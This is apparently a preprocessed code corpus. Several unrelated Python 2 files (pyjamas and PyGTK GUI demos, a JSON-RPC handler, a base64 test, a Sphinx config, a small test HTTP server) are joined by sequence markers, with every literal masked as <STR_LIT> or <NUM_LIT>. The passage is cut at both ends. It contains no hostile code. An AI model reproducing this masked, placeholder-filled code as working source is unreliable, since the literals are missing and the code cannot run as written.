) <EOL> fred . setText ( "<STR_LIT>" ) <EOL> elif txt != "<STR_LIT>" : <EOL> fred . setText ( "<STR_LIT>" ) <EOL> sc . remove ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pyjd . setup ( "<STR_LIT>" ) <EOL> b = Button ( "<STR_LIT>" , greet , StyleName = '<STR_LIT>' ) <EOL> h = HTML ( "<STR_LIT>" , StyleName = '<STR_LIT>' ) <EOL> l = Label ( "<STR_LIT>" , StyleName = '<STR_LIT>' ) <EOL> base = HTML ( "<STR_LIT>" % pygwt . getModuleBaseURL ( ) , <EOL> StyleName = '<STR_LIT>' ) <EOL> RootPanel ( ) . add ( b ) <EOL> RootPanel ( ) . add ( h ) <EOL> RootPanel ( ) . add ( l ) <EOL> RootPanel ( ) . add ( base ) <EOL> StyleSheetCssFile ( "<STR_LIT>" ) <EOL> pyjd . run ( ) </s>
<s> import math <EOL> from pyjamas . chart . GChart import GChart <EOL> from pyjamas . chart . HovertextChunk import formatAsHovertext <EOL> def log10 ( x ) : <EOL> return math . log ( x ) / math . log ( <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> class GChartExample04 ( GChart ) : <EOL> def __init__ ( self ) : <EOL> GChart . __init__ ( self , XChartSize = <NUM_LIT> , YChartSize = <NUM_LIT> ) <EOL> self . setChartTitle ( "<STR_LIT>" ) <EOL> self . addCurve ( ) <EOL> self . getCurve ( ) . getSymbol ( ) . setHovertextTemplate ( <EOL> formatAsHovertext ( "<STR_LIT>" ) ) <EOL> self . getCurve ( ) . setLegendLabel ( "<STR_LIT>" ) <EOL> self . getCurve ( ) . getSymbol ( ) . setBackgroundColor ( "<STR_LIT>" ) <EOL> self . getCurve ( ) . getSymbol ( ) . setBorderColor ( "<STR_LIT>" ) <EOL> self . getCurve ( ) . getSymbol ( ) . setWidth ( <NUM_LIT:9> ) <EOL> self . getCurve ( ) . getSymbol ( ) . setHeight ( <NUM_LIT:9> ) <EOL> for i in range ( - <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> self . getCurve ( ) . addPoint ( i , log10 ( math . pow ( <NUM_LIT:2> , i ) ) ) <EOL> self . getYAxis ( ) . setTickLabelFormat ( "<STR_LIT>" ) <EOL> self . getYAxis ( ) . addTick ( log10 ( <NUM_LIT:0.1> ) ) <EOL> x = <NUM_LIT:0.1> <EOL> while x < <NUM_LIT:10> : <EOL> for y in range ( <NUM_LIT:2> , <NUM_LIT:11> ) : <EOL> self . getYAxis ( ) . addTick ( log10 ( x * y ) ) <EOL> x *= <NUM_LIT:10> <EOL> self . getXAxis ( ) . setAxisLabel ( "<STR_LIT>" ) <EOL> self . getXAxis ( ) . setHasGridlines ( True ) <EOL> self . getXAxis ( ) . setTickCount ( <NUM_LIT:6> ) <EOL> self . getYAxis ( ) . setAxisLabel ( "<STR_LIT>" ) <EOL> self . getYAxis ( ) . setHasGridlines ( True ) </s>
<s> """<STR_LIT>""" <EOL> from threading import Event , Lock <EOL> from errors import * <EOL> try : <EOL> from json import JSONDecoder , JSONEncoder <EOL> except ImportError , e : <EOL> from simplejson import JSONDecoder , JSONEncoder <EOL> class JSONRPCEncoder ( JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , JSONRPCError ) : <EOL> return obj . __class__ . __name__ <EOL> else : <EOL> return JSONEncoder . default ( self , obj ) <EOL> class Timeout ( Exception ) : <EOL> pass <EOL> class ResponseEvent : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . __evt = Event ( ) <EOL> def waiting ( self ) : <EOL> return not self . __evt . isSet ( ) <EOL> def waitForResponse ( self , timeOut = None ) : <EOL> """<STR_LIT>""" <EOL> self . __evt . wait ( timeOut ) <EOL> if self . waiting ( ) : <EOL> raise Timeout ( ) <EOL> else : <EOL> if self . response [ "<STR_LIT:error>" ] : <EOL> raise Exception ( self . response [ "<STR_LIT:error>" ] ) <EOL> else : <EOL> return self . response [ "<STR_LIT:result>" ] <EOL> def handleResponse ( self , resp ) : <EOL> self . response = resp <EOL> self . __evt . set ( ) <EOL> class SimpleMessageHandler : <EOL> def __init__ ( self , DecoderClass = JSONDecoder , EncoderClass = JSONRPCEncoder , messageDelimiter = "<STR_LIT>" ) : <EOL> self . decoder = DecoderClass ( ) <EOL> self . encoder = EncoderClass ( ) <EOL> self . partialData = "<STR_LIT>" <EOL> self . respEvents = { } <EOL> self . respLock = Lock ( ) <EOL> self . messageDelimiter = messageDelimiter <EOL> def close ( self ) : <EOL> pass <EOL> def send ( self , data ) : <EOL> pass <EOL> def sendMessage ( self , msg ) : <EOL> self . send ( self . encoder . encode ( msg ) + self . messageDelimiter ) <EOL> def handlePartialData ( self , data ) : <EOL> data = self . partialData + data . replace ( "<STR_LIT:\r>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) <EOL> msgs = [ ] <EOL> while data != "<STR_LIT>" : <EOL> pos = data . 
find ( "<STR_LIT:{>" ) <EOL> if ( pos > - <NUM_LIT:1> ) : <EOL> data = data [ pos : ] <EOL> try : <EOL> ( obj , pos ) = self . decoder . raw_decode ( data ) <EOL> data = data [ pos : ] <EOL> msgs . append ( obj ) <EOL> except : <EOL> break <EOL> else : <EOL> break <EOL> self . partialData = data <EOL> self . handleMessages ( msgs ) <EOL> def sendNotify ( self , name , args ) : <EOL> """<STR_LIT>""" <EOL> self . sendMessage ( { "<STR_LIT>" : name , "<STR_LIT>" : args } ) <EOL> def sendRequest ( self , name , args ) : <EOL> """<STR_LIT>""" <EOL> ( respEvt , id ) = self . newResponseEvent ( ) <EOL> self . sendMessage ( { "<STR_LIT:id>" : id , "<STR_LIT>" : name , "<STR_LIT>" : args } ) <EOL> return respEvt <EOL> def sendResponse ( self , id , result , error ) : <EOL> """<STR_LIT>""" <EOL> self . sendMessage ( { "<STR_LIT:result>" : result , "<STR_LIT:error>" : error , "<STR_LIT:id>" : id } ) <EOL> def newResponseEvent ( self ) : <EOL> """<STR_LIT>""" <EOL> respEvt = ResponseEvent ( ) <EOL> self . respLock . acquire ( ) <EOL> eid = id ( respEvt ) <EOL> self . respEvents [ eid ] = respEvt <EOL> self . respLock . release ( ) <EOL> return ( respEvt , eid ) <EOL> def handleMessages ( self , msgs ) : <EOL> for msg in msgs : <EOL> if msg . has_key ( "<STR_LIT>" ) and msg . has_key ( "<STR_LIT>" ) : <EOL> if msg . has_key ( "<STR_LIT:id>" ) : <EOL> if msg [ "<STR_LIT:id>" ] : <EOL> self . handleRequest ( msg ) <EOL> else : <EOL> self . handleNotification ( msg ) <EOL> else : <EOL> self . handleNotification ( msg ) <EOL> elif msg . has_key ( "<STR_LIT:result>" ) and msg . has_key ( "<STR_LIT:error>" ) : <EOL> self . handleResponse ( msg ) <EOL> else : <EOL> self . sendResponse ( None , InvalidJSONMessage ( ) ) <EOL> self . close ( ) <EOL> def handleResponse ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> id = resp [ "<STR_LIT:id>" ] <EOL> evt = self . respEvents [ id ] <EOL> del ( self . respEvents [ id ] ) <EOL> evt . 
handleResponse ( resp ) <EOL> def handleRequest ( self , request ) : <EOL> pass <EOL> def handleNotification ( self , notification ) : <EOL> pass <EOL> import re <EOL> NameAllowedRegExp = re . compile ( "<STR_LIT>" ) <EOL> def nameAllowed ( name ) : <EOL> """<STR_LIT>""" <EOL> if NameAllowedRegExp . match ( name ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def getMethodByName ( obj , name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> obj = obj . _getMethodByName ( name ) <EOL> except : <EOL> names = name . split ( "<STR_LIT:.>" ) <EOL> for name in names : <EOL> if nameAllowed ( name ) : <EOL> obj = getattr ( obj , name ) <EOL> else : <EOL> raise MethodNameNotAllowed ( ) <EOL> return obj <EOL> class SimpleServiceHandler ( SimpleMessageHandler ) : <EOL> def __init__ ( self , service , DecoderClass = JSONDecoder , EncoderClass = JSONRPCEncoder , messageDelimiter = "<STR_LIT>" ) : <EOL> self . service = service <EOL> SimpleMessageHandler . __init__ ( self , DecoderClass , EncoderClass , messageDelimiter ) <EOL> try : <EOL> service . _newConnection ( self ) <EOL> except : <EOL> pass <EOL> def close ( self ) : <EOL> try : <EOL> self . service . _closingConnection ( self ) <EOL> except : <EOL> pass <EOL> def handleRequest ( self , req ) : <EOL> """<STR_LIT>""" <EOL> name = req [ "<STR_LIT>" ] <EOL> params = req [ "<STR_LIT>" ] <EOL> id = req [ "<STR_LIT:id>" ] <EOL> obj = None <EOL> try : <EOL> obj = getMethodByName ( self . service , name ) <EOL> except MethodNameNotAllowed , e : <EOL> self . sendResponse ( id , None , e ) <EOL> except : <EOL> self . sendResponse ( id , None , MethodNotFound ( ) ) <EOL> if obj : <EOL> try : <EOL> rslt = obj ( * params ) <EOL> self . sendResponse ( id , rslt , None ) <EOL> except TypeError : <EOL> s = getTracebackStr ( ) <EOL> self . sendResponse ( id , None , InvalidMethodParameters ( ) ) <EOL> except : <EOL> s = getTracebackStr ( ) <EOL> self . 
sendResponse ( id , None , s ) <EOL> def handleNotification ( self , req ) : <EOL> """<STR_LIT>""" <EOL> name = req [ "<STR_LIT>" ] <EOL> params = req [ "<STR_LIT>" ] <EOL> try : <EOL> obj = getMethodByName ( self . service , name ) <EOL> rslt = obj ( * params ) <EOL> except : <EOL> pass </s>
<s> import sys <EOL> import UnitTest <EOL> import base64 <EOL> class Base64ModuleTest ( UnitTest . UnitTest ) : <EOL> def testBase64 ( self ) : <EOL> text = "<STR_LIT>" <EOL> encodetext = base64 . encodestring ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . decodestring ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> encodetext = base64 . b64encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . b64decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> encodetext = base64 . standard_b64encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . standard_b64decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> encodetext = base64 . urlsafe_b64encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . urlsafe_b64decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> def testBase32 ( self ) : <EOL> text = "<STR_LIT>" <EOL> encodetext = base64 . b32encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . b32decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> def testBase16 ( self ) : <EOL> text = "<STR_LIT>" <EOL> encodetext = base64 . b16encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . b16decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) </s>
<s> value = <NUM_LIT:1> <EOL> def get_value ( ) : <EOL> return value </s>
<s> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> intersphinx_mapping = { '<STR_LIT>' : None } </s>
<s> from BaseHTTPServer import HTTPServer , BaseHTTPRequestHandler <EOL> from SocketServer import ThreadingMixIn , ForkingMixIn <EOL> import sys <EOL> import os <EOL> import cgi <EOL> import mimetypes <EOL> import shutil <EOL> import urlparse <EOL> import posixpath <EOL> import urllib <EOL> class Server : <EOL> def __init__ ( self ) : <EOL> server_address = ( '<STR_LIT>' , <NUM_LIT> ) <EOL> httpd = TestHTTPServer ( server_address , TestRequestHandler ) <EOL> httpd . serve_forever ( ) <EOL> class TestHTTPServer ( ThreadingMixIn , HTTPServer ) : <EOL> pass <EOL> class TestRequestHandler ( BaseHTTPRequestHandler ) : <EOL> def __init__ ( self , request , client_address , server ) : <EOL> BaseHTTPRequestHandler . __init__ ( self , request , client_address , server ) <EOL> self . protocol_version = '<STR_LIT>' <EOL> def do_GET ( self ) : <EOL> self . handle_data ( ) <EOL> def do_POST ( self ) : <EOL> self . form = cgi . FieldStorage ( <EOL> fp = self . rfile , <EOL> headers = self . headers , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : self . headers [ '<STR_LIT:Content-Type>' ] , <EOL> } , <EOL> keep_blank_values = True , <EOL> strict_parsing = False ) <EOL> self . handle_data ( ) <EOL> def handle_data ( self ) : <EOL> if self . path == '<STR_LIT:/>' : <EOL> p = '<STR_LIT>' <EOL> elif self . path . endswith ( '<STR_LIT>' ) : <EOL> self . handleUpload ( ) <EOL> return <EOL> else : <EOL> p = self . path <EOL> path = self . translate_path ( p ) <EOL> if not os . path . exists ( path ) : <EOL> p = '<STR_LIT>' + p <EOL> path = self . translate_path ( p ) <EOL> ctype = self . guess_type ( path ) <EOL> try : <EOL> f = open ( path ) <EOL> except IOError : <EOL> print '<STR_LIT>' % path <EOL> self . send_error ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . send_header ( '<STR_LIT>' , ctype ) <EOL> self . send_header ( '<STR_LIT>' , self . date_time_string ( ) ) <EOL> self . 
end_headers ( ) <EOL> self . copyfile ( f , self . wfile ) <EOL> f . close ( ) <EOL> def handleUpload ( self ) : <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . end_headers ( ) <EOL> fileitem = self . form [ '<STR_LIT>' ] <EOL> filename = os . path . basename ( fileitem . filename ) <EOL> filepath = os . path . join ( os . getcwd ( ) , '<STR_LIT>' , filename ) <EOL> f = open ( filepath , '<STR_LIT:wb>' , <NUM_LIT> ) <EOL> def fbuffer ( f , chunk_size = <NUM_LIT> ) : <EOL> while True : <EOL> chunk = f . read ( chunk_size ) <EOL> if not chunk : break <EOL> yield chunk <EOL> for chunk in fbuffer ( fileitem . file ) : <EOL> f . write ( chunk ) <EOL> f . close ( ) <EOL> self . wfile . write ( '<STR_LIT>' ) <EOL> return <EOL> def translate_path ( self , path ) : <EOL> path = path . decode ( '<STR_LIT:utf-8>' ) <EOL> path = urlparse . urlparse ( path ) [ <NUM_LIT:2> ] <EOL> path = posixpath . normpath ( urllib . unquote ( path ) ) <EOL> words = path . split ( '<STR_LIT:/>' ) <EOL> words = filter ( None , words ) <EOL> path = os . getcwd ( ) <EOL> for word in words : <EOL> drive , word = os . path . splitdrive ( word ) <EOL> head , word = os . path . split ( word ) <EOL> if word in ( os . curdir , os . pardir ) : continue <EOL> path = os . path . join ( path , word ) <EOL> return path <EOL> def copyfile ( self , source , outputfile ) : <EOL> shutil . copyfileobj ( source , outputfile ) <EOL> def guess_type ( self , path ) : <EOL> base , ext = posixpath . splitext ( path ) <EOL> if ext in self . extensions_map : <EOL> return self . extensions_map [ ext ] <EOL> ext = ext . lower ( ) <EOL> if ext in self . extensions_map : <EOL> return self . extensions_map [ ext ] <EOL> else : <EOL> return self . extensions_map [ '<STR_LIT>' ] <EOL> if not mimetypes . inited : <EOL> mimetypes . init ( ) <EOL> extensions_map = mimetypes . types_map . copy ( ) <EOL> extensions_map . 
update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> Server ( ) </s>
<s> """<STR_LIT>""" <EOL> from pyjamas . ui . RootPanel import RootPanel <EOL> from pyjamas . ui . DockPanel import DockPanel <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . SimplePanel import SimplePanel <EOL> from pyjamas . ui . VerticalPanel import VerticalPanel <EOL> from pyjamas . ui . Widget import Widget <EOL> from pyjamas import DOM <EOL> from pyjamas import Window <EOL> from __pyjamas__ import wnd <EOL> def indent ( contents , all = None , left = None , right = None , top = None , bottom = None , <EOL> hIndent = None , vIndent = None ) : <EOL> """<STR_LIT>""" <EOL> if all is not None : <EOL> left = all <EOL> right = all <EOL> top = all <EOL> bottom = all <EOL> if hIndent is not None : <EOL> left = hIndent <EOL> right = hIndent <EOL> if vIndent is not None : <EOL> top = vIndent <EOL> bottom = vIndent <EOL> wrapper = DockPanel ( ) <EOL> wrapper . setSpacing ( <NUM_LIT:0> ) <EOL> wrapper . add ( contents , DockPanel . CENTER ) <EOL> if left > <NUM_LIT:0> : <EOL> padding = Whitespace ( width = left ) <EOL> wrapper . add ( padding , DockPanel . WEST ) <EOL> if top > <NUM_LIT:0> : <EOL> padding = Whitespace ( height = top ) <EOL> wrapper . add ( padding , DockPanel . NORTH ) <EOL> if right > <NUM_LIT:0> : <EOL> padding = Whitespace ( width = right ) <EOL> wrapper . add ( padding , DockPanel . EAST ) <EOL> if bottom > <NUM_LIT:0> : <EOL> padding = Whitespace ( height = bottom ) <EOL> wrapper . add ( padding , DockPanel . SOUTH ) <EOL> return wrapper <EOL> def border ( contents ) : <EOL> """<STR_LIT>""" <EOL> wrapper = VerticalPanel ( ) <EOL> wrapper . add ( contents ) <EOL> wrapper . setBorderWidth ( <NUM_LIT:1> ) <EOL> return wrapper <EOL> def colour ( contents , colour ) : <EOL> """<STR_LIT>""" <EOL> wrapper = VerticalPanel ( ) <EOL> wrapper . add ( contents ) <EOL> DOM . setStyleAttribute ( wrapper . 
getElement ( ) , "<STR_LIT>" , colour ) <EOL> return wrapper <EOL> def prompt ( msg , defaultReply = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> return wnd ( ) . prompt ( msg , defaultReply ) ; <EOL> class Whitespace ( Widget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , width = <NUM_LIT:0> , height = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> Widget . __init__ ( self ) <EOL> self . setElement ( DOM . createElement ( '<STR_LIT>' ) ) <EOL> self . setPixelSize ( width , height ) <EOL> class PanelWithLabel ( SimplePanel ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , label , contents ) : <EOL> """<STR_LIT>""" <EOL> SimplePanel . __init__ ( self ) <EOL> label = HTML ( '<STR_LIT>' + label + '<STR_LIT>' ) <EOL> vPanel = VerticalPanel ( ) <EOL> vPanel . add ( indent ( label , left = <NUM_LIT:5> ) ) <EOL> vPanel . add ( border ( indent ( contents , <NUM_LIT:10> ) ) ) <EOL> self . add ( vPanel ) <EOL> class PanelApp : <EOL> """<STR_LIT>""" <EOL> def onModuleLoad ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _curPanelID = None <EOL> self . _root = RootPanel ( ) <EOL> self . _panels = self . createPanels ( ) <EOL> self . showPanel ( self . getDefaultPanel ( ) ) <EOL> def showPanel ( self , panelID ) : <EOL> """<STR_LIT>""" <EOL> if panelID == self . _curPanelID : return <EOL> if self . _curPanelID is not None : <EOL> self . _root . remove ( self . _panels [ self . _curPanelID ] ) <EOL> self . _root . add ( self . _panels [ panelID ] ) <EOL> self . _curPanelID = panelID <EOL> def createPanels ( self ) : <EOL> """<STR_LIT>""" <EOL> Window . alert ( "<STR_LIT>" ) <EOL> def getDefaultPanel ( self ) : <EOL> """<STR_LIT>""" <EOL> Window . alert ( "<STR_LIT>" ) <EOL> class CommandWrapper : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , object , handler ) : <EOL> """<STR_LIT>""" <EOL> self . _object = object <EOL> self . _handler = handler <EOL> def execute ( self ) : <EOL> """<STR_LIT>""" <EOL> handler = getattr ( self . _object , self . 
_handler ) <EOL> handler ( ) </s>
<s> import pyjd <EOL> from pyjamas import Window <EOL> from pyjamas . ui . Tree import Tree <EOL> from pyjamas . ui . TreeItem import TreeItem <EOL> from pyjamas . ui . CheckBox import CheckBox <EOL> from pyjamas . ui . RootPanel import RootPanel <EOL> def onCb1 ( sender ) : <EOL> Window . alert ( '<STR_LIT>' + str ( sender ) + str ( sender . isChecked ( ) ) ) <EOL> def onCb2 ( sender ) : <EOL> Window . alert ( '<STR_LIT>' + str ( sender ) + str ( sender . isChecked ( ) ) ) <EOL> def main ( ) : <EOL> root = RootPanel ( ) <EOL> tree = Tree ( ) <EOL> cb1 = CheckBox ( '<STR_LIT>' ) <EOL> cb1 . addClickListener ( onCb1 ) <EOL> root . add ( cb1 ) <EOL> cb2 = CheckBox ( '<STR_LIT>' ) <EOL> cb2 . addClickListener ( onCb2 ) <EOL> item = TreeItem ( cb2 ) <EOL> tree . addItem ( item ) <EOL> root . add ( tree ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pyjd . setup ( "<STR_LIT>" ) <EOL> main ( ) <EOL> pyjd . run ( ) </s>
<s> import pygtk <EOL> pygtk . require ( '<STR_LIT>' ) <EOL> import gtk , gobject <EOL> def progress_timeout ( pbobj ) : <EOL> if pbobj . activity_check . get_active ( ) : <EOL> pbobj . pbar . pulse ( ) <EOL> else : <EOL> new_val = pbobj . pbar . get_fraction ( ) + <NUM_LIT> <EOL> if new_val > <NUM_LIT:1.0> : <EOL> new_val = <NUM_LIT:0.0> <EOL> pbobj . pbar . set_fraction ( new_val ) <EOL> return True <EOL> class ProgressBar : <EOL> def toggle_show_text ( self , widget , data = None ) : <EOL> if widget . get_active ( ) : <EOL> self . pbar . set_text ( "<STR_LIT>" ) <EOL> else : <EOL> self . pbar . set_text ( "<STR_LIT>" ) <EOL> def toggle_activity_mode ( self , widget , data = None ) : <EOL> if widget . get_active ( ) : <EOL> self . pbar . pulse ( ) <EOL> else : <EOL> self . pbar . set_fraction ( <NUM_LIT:0.0> ) <EOL> def toggle_orientation ( self , widget , data = None ) : <EOL> if self . pbar . get_orientation ( ) == gtk . PROGRESS_LEFT_TO_RIGHT : <EOL> self . pbar . set_orientation ( gtk . PROGRESS_RIGHT_TO_LEFT ) <EOL> elif self . pbar . get_orientation ( ) == gtk . PROGRESS_RIGHT_TO_LEFT : <EOL> self . pbar . set_orientation ( gtk . PROGRESS_LEFT_TO_RIGHT ) <EOL> def destroy_progress ( self , widget , data = None ) : <EOL> gobject . source_remove ( self . timer ) <EOL> self . timer = <NUM_LIT:0> <EOL> gtk . main_quit ( ) <EOL> def __init__ ( self ) : <EOL> self . window = gtk . Window ( gtk . WINDOW_TOPLEVEL ) <EOL> self . window . set_resizable ( True ) <EOL> self . window . connect ( "<STR_LIT>" , self . destroy_progress ) <EOL> self . window . set_title ( "<STR_LIT>" ) <EOL> self . window . set_border_width ( <NUM_LIT:0> ) <EOL> vbox = gtk . VBox ( False , <NUM_LIT:5> ) <EOL> vbox . set_border_width ( <NUM_LIT:10> ) <EOL> self . window . add ( vbox ) <EOL> vbox . show ( ) <EOL> align = gtk . Alignment ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> vbox . pack_start ( align , False , False , <NUM_LIT:5> ) <EOL> align . 
show ( ) <EOL> self . pbar = gtk . ProgressBar ( ) <EOL> align . add ( self . pbar ) <EOL> self . pbar . show ( ) <EOL> self . timer = gobject . timeout_add ( <NUM_LIT:100> , progress_timeout , self ) <EOL> separator = gtk . HSeparator ( ) <EOL> vbox . pack_start ( separator , False , False , <NUM_LIT:0> ) <EOL> separator . show ( ) <EOL> table = gtk . Table ( <NUM_LIT:2> , <NUM_LIT:2> , False ) <EOL> vbox . pack_start ( table , False , True , <NUM_LIT:0> ) <EOL> table . show ( ) <EOL> check = gtk . CheckButton ( "<STR_LIT>" ) <EOL> table . attach ( check , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <EOL> gtk . EXPAND | gtk . FILL , gtk . EXPAND | gtk . FILL , <EOL> <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> check . connect ( "<STR_LIT>" , self . toggle_show_text ) <EOL> check . show ( ) <EOL> self . activity_check = check = gtk . CheckButton ( "<STR_LIT>" ) <EOL> table . attach ( check , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> gtk . EXPAND | gtk . FILL , gtk . EXPAND | gtk . FILL , <EOL> <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> check . connect ( "<STR_LIT>" , self . toggle_activity_mode ) <EOL> check . show ( ) <EOL> check = gtk . CheckButton ( "<STR_LIT>" ) <EOL> table . attach ( check , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <EOL> gtk . EXPAND | gtk . FILL , gtk . EXPAND | gtk . FILL , <EOL> <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> check . connect ( "<STR_LIT>" , self . toggle_orientation ) <EOL> check . show ( ) <EOL> button = gtk . Button ( "<STR_LIT>" ) <EOL> button . connect ( "<STR_LIT>" , self . destroy_progress ) <EOL> vbox . pack_start ( button , False , False , <NUM_LIT:0> ) <EOL> button . set_flags ( gtk . CAN_DEFAULT ) <EOL> button . grab_default ( ) <EOL> button . show ( ) <EOL> self . window . show ( ) <EOL> def main ( ) : <EOL> gtk . main ( ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ProgressBar ( ) <EOL> main ( ) </s>
<s> import pygtk <EOL> pygtk . require ( '<STR_LIT>' ) <EOL> import gtk <EOL> import string , time <EOL> import gtkxpm <EOL> class DragNDropExample : <EOL> HEIGHT = <NUM_LIT> <EOL> WIDTH = <NUM_LIT> <EOL> TARGET_TYPE_TEXT = <NUM_LIT> <EOL> TARGET_TYPE_PIXMAP = <NUM_LIT> <EOL> fromImage = [ ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_TEXT ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_PIXMAP ) ] <EOL> toButton = [ ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_TEXT ) ] <EOL> toCanvas = [ ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_PIXMAP ) ] <EOL> def layout_resize ( self , widget , event ) : <EOL> x , y , width , height = widget . get_allocation ( ) <EOL> if width > self . lwidth or height > self . lheight : <EOL> self . lwidth = max ( width , self . lwidth ) <EOL> self . lheight = max ( height , self . lheight ) <EOL> widget . set_size ( self . lwidth , self . lheight ) <EOL> def makeLayout ( self ) : <EOL> self . lwidth = self . WIDTH <EOL> self . lheight = self . HEIGHT <EOL> box = gtk . VBox ( False , <NUM_LIT:0> ) <EOL> box . show ( ) <EOL> table = gtk . Table ( <NUM_LIT:2> , <NUM_LIT:2> , False ) <EOL> table . show ( ) <EOL> box . pack_start ( table , True , True , <NUM_LIT:0> ) <EOL> layout = gtk . Layout ( ) <EOL> self . layout = layout <EOL> layout . set_size ( self . lwidth , self . lheight ) <EOL> layout . connect ( "<STR_LIT>" , self . layout_resize ) <EOL> layout . show ( ) <EOL> table . attach ( layout , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , gtk . FILL | gtk . EXPAND , <EOL> gtk . FILL | gtk . EXPAND , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> vScrollbar = gtk . VScrollbar ( None ) <EOL> vScrollbar . show ( ) <EOL> table . attach ( vScrollbar , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , gtk . FILL | gtk . SHRINK , <EOL> gtk . FILL | gtk . SHRINK , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> hScrollbar = gtk . HScrollbar ( None ) <EOL> hScrollbar . show ( ) <EOL> table . 
attach ( hScrollbar , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , gtk . FILL | gtk . SHRINK , <EOL> gtk . FILL | gtk . SHRINK , <EOL> <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> vAdjust = layout . get_vadjustment ( ) <EOL> vScrollbar . set_adjustment ( vAdjust ) <EOL> hAdjust = layout . get_hadjustment ( ) <EOL> hScrollbar . set_adjustment ( hAdjust ) <EOL> layout . connect ( "<STR_LIT>" , self . receiveCallback ) <EOL> layout . drag_dest_set ( gtk . DEST_DEFAULT_MOTION | <EOL> gtk . DEST_DEFAULT_HIGHLIGHT | <EOL> gtk . DEST_DEFAULT_DROP , <EOL> self . toCanvas , gtk . gdk . ACTION_COPY ) <EOL> self . addImage ( gtkxpm . gtk_xpm , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> button = gtk . Button ( "<STR_LIT>" ) <EOL> button . show ( ) <EOL> button . connect ( "<STR_LIT>" , self . receiveCallback ) <EOL> button . drag_dest_set ( gtk . DEST_DEFAULT_MOTION | <EOL> gtk . DEST_DEFAULT_HIGHLIGHT | <EOL> gtk . DEST_DEFAULT_DROP , <EOL> self . toButton , gtk . gdk . ACTION_COPY ) <EOL> box . pack_start ( button , False , False , <NUM_LIT:0> ) <EOL> return box <EOL> def addImage ( self , xpm , xd , yd ) : <EOL> hadj = self . layout . get_hadjustment ( ) <EOL> vadj = self . layout . get_vadjustment ( ) <EOL> style = self . window . get_style ( ) <EOL> pixmap , mask = gtk . gdk . pixmap_create_from_xpm_d ( <EOL> self . window . window , style . bg [ gtk . STATE_NORMAL ] , xpm ) <EOL> image = gtk . 